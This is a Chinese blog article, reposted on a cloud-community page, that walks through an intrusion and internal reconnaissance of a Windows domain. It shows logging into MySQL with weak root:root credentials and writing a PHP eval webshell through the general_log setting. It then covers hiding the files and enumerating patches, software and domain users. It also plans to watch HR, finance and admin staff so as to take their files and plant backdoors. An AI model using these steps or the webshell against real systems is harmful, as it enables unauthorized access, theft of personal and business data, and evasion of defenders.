专栏首页糖果的实验室内网信息收集篇

内网信息收集篇

0x01 前情提要

在内网环境中,信息收集尤为重要。(通过多种协议)探测内网存活主机也属于信息收集的一部分。

案例如下:非 root/administrator 下主动信息搜集

此 webshell 这样获取的: 1、通过扫端口,发现某站 8980 端口存在 http 服务; 2、在此端口爆破目录,发现存在 phpStudy 探针文件,获取 web 目录的绝对路径; D:/phpStudy4IIS/WWW。在此探针文件下用 root:root 弱密码进行 MYSQL 检测,发现尝试成功; 3、另外此端口还有 phpMyAdmin 目录,用 root:root 登陆进去; 4、使用 general_log 方法对 mysql 写入一句话木马:

set global general_log='on' 
set global general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php' #一定要使用 '\\'
select "<?php eval($_POST[angel])?>"

5、菜刀连 http://domain:8980/log.php angel 6、连上之后做一些基本的隐蔽目录、更改文件时间等隐蔽化操作。

当前权限为:

在得到一个 webshell 时,非 root/administrator 情况下对目标信息搜集至关重要,它会影响后期的渗透是否顺利,以及渗透方向。

0x02 信息收集

1、获取内网 IP

注:有的目标主机会分配 2 个内网 IP ,如 10.x.x.x 与 192.168.x.x。

2、获取服务软件与杀软

得知部分服务软件,以及杀毒软件 360 全套,一般内网中为杀毒为集体一致。

3、搜集补丁更新频率,以及系统状况

如果目标机器上补丁过多,加上杀软齐全,就应该考虑放弃 exp 提权。 原因1:需要更多的时间消耗在对反病毒软件对抗。 原因2:目标机补丁过多,需要消耗更多的时间。 原因3:可能因为某些 exp 导致蓝屏从而丢失权限。

此种情况下示例提权思路:如目标机器上安装了 mysql,并与内网其中一台建立大量连接。就可以考虑 mysql udf 提权。

单个补丁安装情况查询:

systeminfo>snowming.txt&(for %i in (KB4519572  KB4287903 KB4287904) do @type snowming.txt|@find /i  "%i"|| @echo  no this padding: %i)&del /f /q /a snowming.txt

注:以上需要在可写目录执行。需要临时生成 snowming.txt,以上补丁编号请根据环境来增、删。

4、搜集安装软件以及版本,路径等

wmic product > insformation.txt
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"

5、获取域组、用户

获取全部域用户:

net user /domain

获取域分组:

net group /domain

在域组中,其中有几个组需要特别关注: 1. IT组/研发组:他们掌握在大量的内网密码,数据库密码等。 2. 秘书组:他们掌握着大量的目标机构的内部传达文件,为信息分析业务提供信息,在反馈给技术业务来确定渗透方向。 3. Domain Admins 组:root/administrator 4. 财务组:他们掌握着大量的资金往来与目标企业的规划发展,并且可以通过资金,来判断出目标组织的整体架构。 5. CXX 组,如ceo,cto,coo等。不同的目标组织名字不同,如部长,厂长,经理等。 6. HR 组:他们的电脑中有大量人事信息,商业秘密等。

以 Domain Admins 组为例,开始规划信息探测等级:

  1. 【等级1】确定某部门具体人员数量;
  2. 【等级2】确定该部门的英文用户名的具体信息,如姓名,联系方式,邮箱,职务等。以便确定下一步攻击方向;
  3. 【等级3】分别探测白天/夜间内网中所存活机器并且对应IP地址;
  4. 【等级4】对应人员的工作机内网IP,以及工作时间;
  5. 【等级5】根据信息业务反馈,制定目标安全时间,以便拖拽指定人员文件,或登录目标机器;
  6. 【等级6】制定目标机器后渗透与持续渗透的方式以及后门。

探测等级1:

net group "Domain Admins" /domain

探测等级2:

for /f %i in (1.txt) do net user %i /domain >>user.txt

注:1.txt 为上一步收集到的用户名:

后面可以结合 meterpreter 获取反弹 shell、测试内网段在线主机、获取主机操作系统信息、获取端口服务开放情况等。

注:可以在不同的时段(白天/晚上)探测内网段在线主机。

0x03 总结

本文中探讨了非 root/administrator 用户下的主动信息搜集。

iis appool\defaultappool 的权限下,逐步获取了如下信息:

  1. 该目标内网分配段
  2. 安装的软件
  3. 杀毒软件情况
  4. 端口开放情况
  5. 运行的服务
  6. 补丁情况
  7. 管理员上线操作时间段
  8. 域用户详细信息(英文 user 对应的职务,姓名等)
  9. 根据域内分组可以进一步确定攻击方向。如秘书组,如 hr 组等。

进一步提权可以结合运行的服务,如 mysql 提权。

本文来自作者Snowming,文章仅供学习研究网络安全,不可用于非法用途,因为该文章而触犯中华人民共和国法律的,一切后果自己负责,作者和平台不承担任何责任。

本文分享自微信公众号 - 糖果的实验室(mycandylab),作者:安全祖师爷

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-12-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 使用LUA对大批量IP数据进行IP频次统计

    上次我们利用LUA的表数据结构的特性,对IP数据进行去重的操作,接下来的是更进一步对数据进行统计,统计出数每个IP出现的频次,然后对出重之后的数据进行排序,得出...

    糖果
  • 用LUA字典进行IP数据去重操作

    因为业务需要,监控手机客户端对服务器在一分钟内请求的总数和IP访问量(求PV、IP数),要对IP数据进行去重操作,单位时间1分钟的HTTP请求,IP相同的只保留...

    糖果
  • Luabit的位运算

    Lua提供了bit库,可以对变量数据进行位运算,在某些应有场景,我们得确需要在lua中对数据进行位移,或是进行“与,或,非”,进制转换等操作。

    糖果
  • 互联网“寒冬”真的来了,我们该如何“抗”冻?

    在18年这个寒冷的冬天,自己就只剩下自己,一穷二白,甚至连个能相互取暖的人都没有了。

    老九君
  • 15 道二叉树手写算法题(二)

    在上一期讲到,树和链表的手写算法题在面试中出现的频率最高。也正是因为这样,如果你马上就要参加面试,但之前没有刷多少算法题,那么很建议你先看看树和链表相关的题目。...

    乔戈里
  • 官方推荐:MySQL忘记root密码

    打开MySQL官网,在其首页搜缩框输入“forget password”搜索,意思是“忘记密码”。(搜索框有点小,点击那个放大镜就可以输入) 

    KEVINGUO_CN
  • cluster(3)

    (一) lvs-fullnat fullnat模式的性能虽然不如dr模式,但是,fullnat支持多vlan,再rs是不同的vlan的情况下,明显使用full...

    py3study
  • 基于LVM的磁盘管理

    LVM是逻辑盘卷管理(Logical Volume Manager)的简称,它是Linux环境下对磁盘分区进行管理的一种机制,LVM是建立在硬盘和分区之上的一个...

    耕耘实录
  • rsync配合ssh在不稳定网络下传输大文件

    jeremyxu
  • 10个Linux基础面试问题和答案(1)

    张尧博客

扫码关注云+社区

领取腾讯云代金券